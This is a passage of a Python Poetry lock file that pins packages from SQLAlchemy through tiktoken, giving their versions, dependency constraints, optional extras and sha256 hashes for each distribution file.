"SQLAlchemy-2.0.22-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:9886a72c8e6371280cb247c5d32c9c8fa141dc560124348762db8a8b236f8692"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:a571bc8ac092a3175a1d994794a8e7a1f2f651e7c744de24a19b4f740fe95034"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8db5ba8b7da759b727faebc4289a9e6a51edadc7fc32207a30f7c6203a181592"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:0b0b3f2686c3f162123adba3cb8b626ed7e9b8433ab528e36ed270b4f70d1cdb"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:0c1fea8c0abcb070ffe15311853abfda4e55bf7dc1d4889497b3403629f3bf00"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:4bb062784f37b2d75fd9b074c8ec360ad5df71f933f927e9e95c50eb8e05323c"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-win32.whl", hash = "sha256:58a3aba1bfb32ae7af68da3f277ed91d9f57620cf7ce651db96636790a78b736"}, {file = "SQLAlchemy-2.0.22-cp39-cp39-win_amd64.whl", hash = "sha256:92e512a6af769e4725fa5b25981ba790335d42c5977e94ded07db7d641490a85"}, {file = "SQLAlchemy-2.0.22-py3-none-any.whl", hash = "sha256:3076740335e4aaadd7deb3fe6dcb96b3015f1613bd190a4e1634e1b99b02ec86"}, {file = "SQLAlchemy-2.0.22.tar.gz", hash = 
"sha256:5434cc601aa17570d79e5377f5fd45ff92f9379e2abed0be5e8c2fba8d353d2b"}, ] [package.dependencies] greenlet = {version = "!=0.4.17", markers = "platform_machine == \"aarch64\" or platform_machine == \"ppc64le\" or platform_machine == \"x86_64\" or platform_machine == \"amd64\" or platform_machine == \"AMD64\" or platform_machine == \"win32\" or platform_machine == \"WIN32\""} typing-extensions = ">=4.2.0" [package.extras] aiomysql = ["aiomysql (>=0.2.0)", "greenlet (!=0.4.17)"] aiosqlite = ["aiosqlite", "greenlet (!=0.4.17)", "typing-extensions (!=3.10.0.1)"] asyncio = ["greenlet (!=0.4.17)"] asyncmy = ["asyncmy (>=0.2.3,!=0.2.4,!=0.2.6)", "greenlet (!=0.4.17)"] mariadb-connector = ["mariadb (>=1.0.1,!=1.1.2,!=1.1.5)"] mssql = ["pyodbc"] mssql-pymssql = ["pymssql"] mssql-pyodbc = ["pyodbc"] mypy = ["mypy (>=0.910)"] mysql = ["mysqlclient (>=1.4.0)"] mysql-connector = ["mysql-connector-python"] oracle = ["cx-oracle (>=7)"] oracle-oracledb = ["oracledb (>=1.0.1)"] postgresql = ["psycopg2 (>=2.7)"] postgresql-asyncpg = ["asyncpg", "greenlet (!=0.4.17)"] postgresql-pg8000 = ["pg8000 (>=1.29.1)"] postgresql-psycopg = ["psycopg (>=3.0.7)"] postgresql-psycopg2binary = ["psycopg2-binary"] postgresql-psycopg2cffi = ["psycopg2cffi"] postgresql-psycopgbinary = ["psycopg[binary] (>=3.0.7)"] pymysql = ["pymysql"] sqlcipher = ["sqlcipher3-binary"] [[package]] name = "sqlite-vss" version = "0.1.2" description = "" optional = true python-versions = ">=3.7" files = [ {file = "sqlite_vss-0.1.2-py3-none-macosx_10_6_x86_64.whl", hash = "sha256:9eefa4207f8b522e32b2747fce44422c773e36710bf807613795218c7ba125f0"}, {file = "sqlite_vss-0.1.2-py3-none-macosx_11_0_arm64.whl", hash = "sha256:84994eaf7fe700218b258422358c4536a6aca39b96026c308b28630967f954c4"}, {file = "sqlite_vss-0.1.2-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.manylinux1_x86_64.whl", hash = "sha256:e44f03bc4cb214bb77b206519abfb623e3e4795967a569218e288927a7715806"}, ] [package.extras] test = ["pytest"] [[package]] name = "sqlitedict" version = "2.1.0" description = "Persistent dict in Python, backed up by sqlite3 and pickle, multithread-safe." optional = true python-versions = "*" files = [ {file = "sqlitedict-2.1.0.tar.gz", hash = "sha256:03d9cfb96d602996f1d4c2db2856f1224b96a9c431bdd16e78032a72940f9e8c"}, ] [[package]] name = "sqlparams" version = "5.1.0" description = "Convert between various DB API 2.0 parameter styles." 
optional = true python-versions = ">=3.7" files = [ {file = "sqlparams-5.1.0-py3-none-any.whl", hash = "sha256:ee4ef620a5197535e5ebb9217e2f453f08b044634b3d890f3d6701e4f838c85c"}, {file = "sqlparams-5.1.0.tar.gz", hash = "sha256:1abe87a0684567265b2b86f5a482d5c37db237c0268d4c81774ffedce4300199"}, ] [[package]] name = "stack-data" version = "0.6.3" description = "Extract data from python stack frames and tracebacks for informative displays" optional = false python-versions = "*" files = [ {file = "stack_data-0.6.3-py3-none-any.whl", hash = "sha256:d5558e0c25a4cb0853cddad3d77da9891a08cb85dd9f9f91b9f8cd66e511e695"}, {file = "stack_data-0.6.3.tar.gz", hash = "sha256:836a778de4fec4dcd1dcd89ed8abff8a221f58308462e1c4aa2a3cf30148f0b9"}, ] [package.dependencies] asttokens = ">=2.1.0" executing = ">=1.2.0" pure-eval = "*" [package.extras] tests = ["cython", "littleutils", "pygments", "pytest", "typeguard"] [[package]] name = "streamlit" version = "1.22.0" description = "A faster way to build and share data apps" optional = true python-versions = ">=3.7, !=3.9.7" files = [ {file = "streamlit-1.22.0-py2.py3-none-any.whl", hash = "sha256:520dd9b9e6efb559b5a9a22feadb48b1e6f0340ec83da3514810059fdecd4167"}, {file = "streamlit-1.22.0.tar.gz", hash = "sha256:5bef9bf8deef32814d9565c9df48331e6357eb0b90dabc3ec4f53c44fb34fc73"}, ] [package.dependencies] altair = ">=3.2.0,<5" blinker = ">=1.0.0" cachetools = ">=4.0" click = ">=7.0" gitpython = "!=3.1.19" importlib-metadata = ">=1.4" numpy = "*" packaging = ">=14.1" pandas = ">=0.25,<3" pillow = ">=6.2.0" protobuf = ">=3.12,<4" pyarrow = ">=4.0" pydeck = ">=0.1.dev5" pympler = ">=0.9" python-dateutil = "*" requests = ">=2.4" rich = ">=10.11.0" tenacity = ">=8.0.0,<9" toml = "*" tornado = ">=6.0.3" typing-extensions = ">=3.10.0.0" tzlocal = ">=1.1" validators = ">=0.2" watchdog = {version = "*", markers = "platform_system != \"Darwin\""} [package.extras] snowflake = ["snowflake-snowpark-python"] [[package]] name = "stringcase" version = "1.2.0" description = "String case converter." 
optional = true python-versions = "*" files = [ {file = "stringcase-1.2.0.tar.gz", hash = "sha256:48a06980661908efe8d9d34eab2b6c13aefa2163b3ced26972902e3bdfd87008"}, ] [[package]] name = "sympy" version = "1.12" description = "Computer algebra system (CAS) in Python" optional = true python-versions = ">=3.8" files = [ {file = "sympy-1.12-py3-none-any.whl", hash = "sha256:c3588cd4295d0c0f603d0f2ae780587e64e2efeedb3521e46b9bb1d08d184fa5"}, {file = "sympy-1.12.tar.gz", hash = "sha256:ebf595c8dac3e0fdc4152c51878b498396ec7f30e7a914d6071e674d49420fb8"}, ] [package.dependencies] mpmath = ">=0.19" [[package]] name = "syrupy" version = "4.6.0" description = "Pytest Snapshot Test Utility" optional = false python-versions = ">=3.8.1,<4" files = [ {file = "syrupy-4.6.0-py3-none-any.whl", hash = "sha256:747aae1bcf3cb3249e33b1e6d81097874d23615982d5686ebe637875b0775a1b"}, {file = "syrupy-4.6.0.tar.gz", hash = "sha256:231b1f5d00f1f85048ba81676c79448076189c4aef4d33f21ae32f3b4c565a54"}, ] [package.dependencies] pytest = ">=7.0.0,<8.0.0" [[package]] name = "telethon" version = "1.31.1" description = "Full-featured Telegram client library for Python 3" optional = true python-versions = ">=3.5" files = [ {file = "Telethon-1.31.1.tar.gz", hash = "sha256:299567c307818e0ecd1ecb208c2f4269be4ea84fdea49b5061c36362dc92abbd"}, ] [package.dependencies] pyaes = "*" rsa = "*" [package.extras] cryptg = ["cryptg"] [[package]] name = "tenacity" version = "8.2.3" description = "Retry code until it succeeds" optional = false python-versions = ">=3.7" files = [ {file = "tenacity-8.2.3-py3-none-any.whl", hash = "sha256:ce510e327a630c9e1beaf17d42e6ffacc88185044ad85cf74c0a8887c6a0f88c"}, {file = "tenacity-8.2.3.tar.gz", hash = "sha256:5398ef0d78e63f40007c1fb4c0bff96e1911394d2fa8d194f77619c05ff6cc8a"}, ] [package.extras] doc = ["reno", "sphinx", "tornado (>=4.5)"] [[package]] name = "tensorboard" version = "2.11.2" description = "TensorBoard lets you watch Tensors Flow" optional = true python-versions = ">=3.7" files = [ {file = "tensorboard-2.11.2-py3-none-any.whl", hash = "sha256:cbaa2210c375f3af1509f8571360a19ccc3ded1d9641533414874b5deca47e89"}, ] [package.dependencies] absl-py = ">=0.4" google-auth = ">=1.6.3,<3" google-auth-oauthlib = ">=0.4.1,<0.5" grpcio = ">=1.24.3" markdown = ">=2.6.8" numpy = ">=1.12.0" protobuf = ">=3.9.2,<4" requests = ">=2.21.0,<3" setuptools = ">=41.0.0" tensorboard-data-server = ">=0.6.0,<0.7.0" tensorboard-plugin-wit = ">=1.6.0" werkzeug = ">=1.0.1" wheel = ">=0.26" [[package]] name = "tensorboard-data-server" version = "0.6.1" description = "Fast data loading for TensorBoard" optional = true python-versions = ">=3.6" files = [ {file = "tensorboard_data_server-0.6.1-py3-none-any.whl", hash = "sha256:809fe9887682d35c1f7d1f54f0f40f98bb1f771b14265b453ca051e2ce58fca7"}, {file = "tensorboard_data_server-0.6.1-py3-none-macosx_10_9_x86_64.whl", hash = "sha256:fa8cef9be4fcae2f2363c88176638baf2da19c5ec90addb49b1cde05c95c88ee"}, {file = "tensorboard_data_server-0.6.1-py3-none-manylinux2010_x86_64.whl", hash = "sha256:d8237580755e58eff68d1f3abefb5b1e39ae5c8b127cc40920f9c4fb33f4b98a"}, ] [[package]] name = "tensorboard-plugin-wit" version = "1.8.1" description = "What-If Tool TensorBoard plugin." 
optional = true python-versions = "*" files = [ {file = "tensorboard_plugin_wit-1.8.1-py3-none-any.whl", hash = "sha256:ff26bdd583d155aa951ee3b152b3d0cffae8005dc697f72b44a8e8c2a77a8cbe"}, ] [[package]] name = "tensorflow" version = "2.11.1" description = "TensorFlow is an open source machine learning framework for everyone." optional = true python-versions = ">=3.7" files = [ {file = "tensorflow-2.11.1-cp310-cp310-macosx_10_14_x86_64.whl", hash = "sha256:ac0e46c5de7985def49e4f688a0ca4180949a4d5dc62b89e9c6640db3c3982ba"}, {file = "tensorflow-2.11.1-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:45b1669c523fa6dc240688bffe79f08dfbb76bf5e23a7fe10e722ba658637a44"}, {file = "tensorflow-2.11.1-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9a96595e0c068d54717405fa12f36b4a5bb0a9fc53fb9065155a92cff944b35b"}, {file = "tensorflow-2.11.1-cp310-cp310-win_amd64.whl", hash = "sha256:13197f18f31a52d3f2eac28743d1b06abb8efd86017f184110a1b16841b745b1"}, {file = "tensorflow-2.11.1-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:9f030f1bc9e7763fa03ec5738323c42021ababcd562fe861b3a3f41e9ff10e43"}, {file = "tensorflow-2.11.1-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9f12855c1e8373c1327650061fd6a9a3d3772e1bac8241202ea8ccb56213d005"}, {file = "tensorflow-2.11.1-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:76cd4279cb500074a8ab28af116af7f060f0b015651bef552769d51e55d6fd5c"}, {file = "tensorflow-2.11.1-cp38-cp38-win_amd64.whl", hash = "sha256:f5a2f75f28cd5fb615a5306f2091eac7da3a8fff949ab8804ec06b8e3682f837"}, {file = "tensorflow-2.11.1-cp39-cp39-macosx_10_14_x86_64.whl", hash = "sha256:ea93246ad6c90ff0422f06a82164836fe8098989a8a65c3b02c720eadbe15dde"}, {file = "tensorflow-2.11.1-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:30ba6b3c2f68037e965a19427a1f2a5f0351b7ceae6c686938a8485b08e1e1f3"}, {file = "tensorflow-2.11.1-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9ddd5c61f68d8125c985370de96a24a80aee5e3f1604efacec7e1c34ca72de24"}, {file = "tensorflow-2.11.1-cp39-cp39-win_amd64.whl", hash = "sha256:b7d8834df3f72d7eab56bc2f34f2e52b82d705776b80b36bf5470b7538c9865c"}, ] [package.dependencies] absl-py = ">=1.0.0" astunparse = ">=1.6.0" flatbuffers = ">=2.0" gast = ">=0.2.1,<=0.4.0" google-pasta = ">=0.1.1" grpcio = ">=1.24.3,<2.0" h5py = ">=2.9.0" keras = ">=2.11.0,<2.12" libclang = ">=13.0.0" numpy = ">=1.20" opt-einsum = ">=2.3.2" packaging = "*" protobuf = ">=3.9.2,<3.20" setuptools = "*" six = ">=1.12.0" tensorboard = ">=2.11,<2.12" tensorflow-estimator = ">=2.11.0,<2.12" tensorflow-io-gcs-filesystem = {version = ">=0.23.1", markers = "platform_machine != \"arm64\" or platform_system != \"Darwin\""} termcolor = ">=1.1.0" typing-extensions = ">=3.6.6" wrapt = ">=1.11.0" [[package]] name = "tensorflow-estimator" version = "2.11.0" description = "TensorFlow Estimator." optional = true python-versions = ">=3.7" files = [ {file = "tensorflow_estimator-2.11.0-py2.py3-none-any.whl", hash = "sha256:ea3b64acfff3d9a244f06178c9bdedcbdd3f125b67d0888dba8229498d06468b"}, ] [[package]] name = "tensorflow-hub" version = "0.15.0" description = "TensorFlow Hub is a library to foster the publication, discovery, and consumption of reusable parts of machine learning models." 
optional = true python-versions = "*" files = [ {file = "tensorflow_hub-0.15.0-py2.py3-none-any.whl", hash = "sha256:8af12cb2d1fc0d1a9509a620e7589daf173714e99f08aaf090a4748ff20b45c8"}, ] [package.dependencies] numpy = ">=1.12.0" protobuf = ">=3.19.6" [[package]] name = "tensorflow-io-gcs-filesystem" version = "0.34.0" description = "TensorFlow IO" optional = true python-versions = ">=3.7, <3.12" files = [ {file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-macosx_10_14_x86_64.whl", hash = "sha256:d831702fbb270996b27cda7fde06e0825b2ea81fd8dd3ead35242f4f8b3889b8"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:b9a93fcb01db269bc845a1ced431f3c61201755ce5f9ec4885760f30122276ef"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:5813c336b4f7cb0a01ff4cc6cbd3edf11ef67305baf0e3cf634911b702f493f8"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:2b035f4c92639657b6d376929d550ac3dee9e6c0523eb434eefe0a27bae3d05b"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-macosx_10_14_x86_64.whl", hash = "sha256:a17a616d2c7fae83de4424404815843507d40d4eb0d507c636a5493a20c3d958"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-macosx_12_0_arm64.whl", hash = "sha256:ec4604c99cbb5b708f4516dee27aa655abae222b876c98b740f4c2f89dd5c001"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:cbe26c4a3332589c7b724f147df453b5c226993aa8d346a15536358d77b364c4"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:6e6353123a5b51397950138a118876af833a7db66b531123bb86f82e80ab0e72"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp37-cp37m-macosx_10_14_x86_64.whl", hash = "sha256:f211d2b3db8f9931765992b607b71cbfb98c8cd6169079d004a67a94ab10ecb4"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp37-cp37m-macosx_12_0_arm64.whl", hash = "sha256:d3feba2dd76f7c188137c34642d68d378f0eed81636cb95090ecb1496722707c"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp37-cp37m-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:44ad387a812a78e7424bb8bee3820521ae1c044bddf72b1e163e8df95c124a74"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-macosx_10_14_x86_64.whl", hash = "sha256:7f60183473f0ca966451bb1d1bb5dc29b3cf9c74d1d0e7f2ed46760ed56bd4af"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:3f346b287ed2400e09b13cfd8524222fd70a66aadb9164c645286c2087007e9f"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = "sha256:027a07553367187f918a99661f63ae0506b91b77a70bee9c7ccaf3920bf7cfe7"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8d8664bddbe4e7b56ce94db8b93ea9077a158fb5e15364e11e29f93015ceea24"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-macosx_10_14_x86_64.whl", hash = "sha256:182b0fbde7e9a537fda0b354c28b0b6c035736728de8fe2db7ef49cf90352014"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:0dafed144673e1173528768fe208a7c5a6e8edae40208381cac420ee7c918ec9"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-manylinux_2_12_x86_64.manylinux2010_x86_64.whl", hash = 
"sha256:396bfff61b49f80b86ddebe0c76ae0f2731689cee49ad7d782625180b50b13af"}, {file = "tensorflow_io_gcs_filesystem-0.34.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b20622f8572fcb6c93e8f7d626327472f263e47ebd63d2153ef09162ef5ef7b5"}, ] [package.extras] tensorflow = ["tensorflow (>=2.13.0,<2.14.0)"] tensorflow-aarch64 = ["tensorflow-aarch64 (>=2.13.0,<2.14.0)"] tensorflow-cpu = ["tensorflow-cpu (>=2.13.0,<2.14.0)"] tensorflow-gpu = ["tensorflow-gpu (>=2.13.0,<2.14.0)"] tensorflow-rocm = ["tensorflow-rocm (>=2.13.0,<2.14.0)"] [[package]] name = "tensorflow-macos" version = "2.11.0" description = "TensorFlow is an open source machine learning framework for everyone." optional = true python-versions = ">=3.7" files = [ {file = "tensorflow_macos-2.11.0-cp310-cp310-macosx_12_0_arm64.whl", hash = "sha256:0bdbd1bb564d01bd735d6d11451f0658c3dd8187369ee9dd3ed6de6bbdd6df53"}, {file = "tensorflow_macos-2.11.0-cp310-cp310-macosx_12_0_x86_64.whl", hash = "sha256:66eb67915cf418eddd3b4c158132609efd50895fa09fd55e4b2f14a3ab85bd34"}, {file = "tensorflow_macos-2.11.0-cp38-cp38-macosx_12_0_arm64.whl", hash = "sha256:6810731e2c8353123f6c9c944d2765b58a2226e7eb9fec1e360f73977c6c6aa4"}, {file = "tensorflow_macos-2.11.0-cp38-cp38-macosx_12_0_x86_64.whl", hash = "sha256:881b36d97b67d24197250a091c52c31db14aecfdbf1ac20418a148ec37321978"}, {file = "tensorflow_macos-2.11.0-cp39-cp39-macosx_12_0_arm64.whl", hash = "sha256:8d56b0d0bd140008b0cc4877804c9c310e1e2735444fa99bc7c88ffb2909153d"}, {file = "tensorflow_macos-2.11.0-cp39-cp39-macosx_12_0_x86_64.whl", hash = "sha256:db97cd91b905bd01069069f07325a2a291705222eb4914148b9574090a5815ae"}, ] [package.dependencies] absl-py = ">=1.0.0" astunparse = ">=1.6.0" flatbuffers = ">=2.0" gast = ">=0.2.1,<=0.4.0" google-pasta = ">=0.1.1" grpcio = ">=1.24.3,<2.0" h5py = ">=2.9.0" keras = ">=2.11.0,<2.12" libclang = ">=13.0.0" numpy = ">=1.20" opt-einsum = ">=2.3.2" packaging = "*" protobuf = ">=3.9.2,<3.20" setuptools = "*" six = ">=1.12.0" tensorboard = ">=2.11,<2.12" tensorflow-estimator = ">=2.11.0,<2.12" termcolor = ">=1.1.0" typing-extensions = ">=3.6.6" wrapt = ">=1.11.0" [[package]] name = "tensorflow-text" version = "2.11.0" description = "TF.Text is a TensorFlow library of text related ops, modules, and subgraphs." 
optional = true python-versions = "*" files = [ {file = "tensorflow_text-2.11.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c9d4797e331da37419f2b19159fbc0f125ed60467340e9a209ab8f8d65856704"}, {file = "tensorflow_text-2.11.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:b4abede4191820ae6d5a7c74f02c335a5f2e2df174eaa38b481b2b82a3330152"}, {file = "tensorflow_text-2.11.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:49194f85e03a2e3f017ac8e0e3d3927104fa20e6e883b43087cff032fe2cbe14"}, {file = "tensorflow_text-2.11.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:a3ea14efeb1d627ed5098e791e95bb98ee6f9f928f9eda785205e184cc20b428"}, {file = "tensorflow_text-2.11.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:a207ceea4c71a932c35e4d208d7b8c3edc65a5ba0eebfdc9233fc8da546625c9"}, {file = "tensorflow_text-2.11.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:506fbea82a1ec566d7d0f771adad589c44727d904311103169466d88236ec2c8"}, {file = "tensorflow_text-2.11.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:cf0033bf47872b57d46f78d7058db5676f396a9327fa4d063a2c73cce43586ae"}, {file = "tensorflow_text-2.11.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:56693df33461ab0e7f32549010ca38a8d01291fd67142e0396d0aeb9fcad2e09"}, ] [package.dependencies] tensorflow = {version = ">=2.11.0,<2.12", markers = "platform_machine != \"arm64\" or platform_system != \"Darwin\""} tensorflow-hub = ">=0.8.0" tensorflow-macos = {version = ">=2.11.0,<2.12", markers = "platform_machine == \"arm64\" and platform_system == \"Darwin\""} [package.extras] tensorflow-cpu = ["tensorflow-cpu (>=2.11.0,<2.12)"] tests = ["absl-py", "pytest", "tensorflow-datasets (>=3.2.0)"] [[package]] name = "termcolor" version = "2.3.0" description = "ANSI color formatting for output in terminal" optional = true python-versions = ">=3.7" files = [ {file = "termcolor-2.3.0-py3-none-any.whl", hash = "sha256:3afb05607b89aed0ffe25202399ee0867ad4d3cb4180d98aaf8eefa6a5f7d475"}, {file = "termcolor-2.3.0.tar.gz", hash = "sha256:b5b08f68937f138fe92f6c089b99f1e2da0ae56c52b78bf7075fd95420fd9a5a"}, ] [package.extras] tests = ["pytest", "pytest-cov"] [[package]] name = "terminado" version = "0.17.1" description = "Tornado websocket backend for the Xterm.js Javascript terminal emulator library." 
optional = false python-versions = ">=3.7" files = [ {file = "terminado-0.17.1-py3-none-any.whl", hash = "sha256:8650d44334eba354dd591129ca3124a6ba42c3d5b70df5051b6921d506fdaeae"}, {file = "terminado-0.17.1.tar.gz", hash = "sha256:6ccbbcd3a4f8a25a5ec04991f39a0b8db52dfcd487ea0e578d977e6752380333"}, ] [package.dependencies] ptyprocess = {version = "*", markers = "os_name != \"nt\""} pywinpty = {version = ">=1.1.0", markers = "os_name == \"nt\""} tornado = ">=6.1.0" [package.extras] docs = ["myst-parser", "pydata-sphinx-theme", "sphinx"] test = ["pre-commit", "pytest (>=7.0)", "pytest-timeout"] [[package]] name = "textstat" version = "0.7.3" description = "Calculate statistical features from text" optional = true python-versions = ">=3.6" files = [ {file = "textstat-0.7.3-py3-none-any.whl", hash = "sha256:cbd9d641aa5abff0852638f0489913f31ea52fe597ccbaa337b4fc2a44efd15e"}, {file = "textstat-0.7.3.tar.gz", hash = "sha256:60b63cf8949f45bbb3b4205e4411bbc1cd66df4c08aef12545811c7e6e24f011"}, ] [package.dependencies] pyphen = "*" [[package]] name = "threadpoolctl" version = "3.2.0" description = "threadpoolctl" optional = true python-versions = ">=3.8" files = [ {file = "threadpoolctl-3.2.0-py3-none-any.whl", hash = "sha256:2b7818516e423bdaebb97c723f86a7c6b0a83d3f3b0970328d66f4d9104dc032"}, {file = "threadpoolctl-3.2.0.tar.gz", hash = "sha256:c96a0ba3bdddeaca37dc4cc7344aafad41cdb8c313f74fdfe387a867bba93355"}, ] [[package]] name = "tigrisdb" version = "1.0.0b6" description = "Python SDK for Tigris <http://www.tigrisdata.com>" optional = true python-versions = ">=3.8,<4.0" files = [ {file = "tigrisdb-1.0.0b6-py3-none-any.whl", hash = "sha256:8d316a61df0df09f6a269be729f8077af965d6bc39f6a00b60d3ffcb57f9d80b"}, {file = "tigrisdb-1.0.0b6.tar.gz", hash = "sha256:5160b3379aaa379fa4194c3e5d549e8be723aab922991021b8c0afd340ff14f5"}, ] [package.dependencies] grpcio-tools = ">=1.46.0" protobuf = ">=3.19.6" [[package]] name = "tiktoken" version = "0.3.3" description = "tiktoken is a fast BPE tokeniser for use with OpenAI's models" optional = false python-versions = ">=3.8" files = [ {file = "tiktoken-0.3.3-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:d1f37fa75ba70c1bc7806641e8ccea1fba667d23e6341a1591ea333914c226a9"}, {file = "tiktoken-0.3.3-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:3d7296c38392a943c2ccc0b61323086b8550cef08dcf6855de9949890dbc1fd3"}, {file = "tiktoken-0.3.3-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:3c84491965e139a905280ac28b74baaa13445b3678e07f96767089ad1ef5ee7b"}, {file = "tiktoken-0.3.3-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:65970d77ea85ce6c7fce45131da9258cd58a802ffb29ead8f5552e331c025b2b"}, {file = "tiktoken-0.3.3-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:bd3f72d0ba7312c25c1652292121a24c8f1711207b63c6d8dab21afe4be0bf04"}, {file = "tiktoken-0.3.3-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:719c9e13432602dc496b24f13e3c3ad3ec0d2fbdb9aace84abfb95e9c3a425a4"}, {file = "tiktoken-0.3.3-cp310-cp310-win_amd64.whl", hash = "sha256:dc00772284c94e65045b984ed7e9f95d000034f6b2411df252011b069bd36217"}, {file = "tiktoken-0.3.3-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:4db2c40f79f8f7a21a9fdbf1c6dee32dea77b0d7402355dc584a3083251d2e15"}, {file = "tiktoken-0.3.3-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:e3c0f2231aa3829a1a431a882201dc27858634fd9989898e0f7d991dbc6bcc9d"}, {file = "tiktoken-0.3.3-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = 
"sha256:48c13186a479de16cfa2c72bb0631fa9c518350a5b7569e4d77590f7fee96be9"}, {file = "tiktoken-0.3.3-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6674e4e37ab225020135cd66a392589623d5164c6456ba28cc27505abed10d9e"}, {file = "tiktoken-0.3.3-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:4a0c1357f6191211c544f935d5aa3cb9d7abd118c8f3c7124196d5ecd029b4af"}, {file = "tiktoken-0.3.3-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:2e948d167fc3b04483cbc33426766fd742e7cefe5346cd62b0cbd7279ef59539"}, {file = "tiktoken-0.3.3-cp311-cp311-win_amd64.whl", hash = "sha256:5dca434c8680b987eacde2dbc449e9ea4526574dbf9f3d8938665f638095be82"}, {file = "tiktoken-0.3.3-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:984758ebc07cd8c557345697c234f1f221bd730b388f4340dd08dffa50213a01"}, {file = "tiktoken-0.3.3-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:891012f29e159a989541ae47259234fb29ff88c22e1097567316e27ad33a3734"}, {file = "tiktoken-0.3.3-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:210f8602228e4c5d706deeb389da5a152b214966a5aa558eec87b57a1969ced5"}, {file = "tiktoken-0.3.3-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:dd783564f80d4dc44ff0a64b13756ded8390ed2548549aefadbe156af9188307"}, {file = "tiktoken-0.3.3-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:03f64bde9b4eb8338bf49c8532bfb4c3578f6a9a6979fc176d939f9e6f68b408"}, {file = "tiktoken-0.3.3-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:1ac369367b6f5e5bd80e8f9a7766ac2a9c65eda2aa856d5f3c556d924ff82986"}, {file = "tiktoken-0.3.3-cp38-cp38-win_amd64.whl", hash = "sha256:94600798891f78db780e5aa9321456cf355e54a4719fbd554147a628de1f163f"}, {file = "tiktoken-0.3.3-cp39-cp39-macosx_10_9_x86_64.whl", hash = 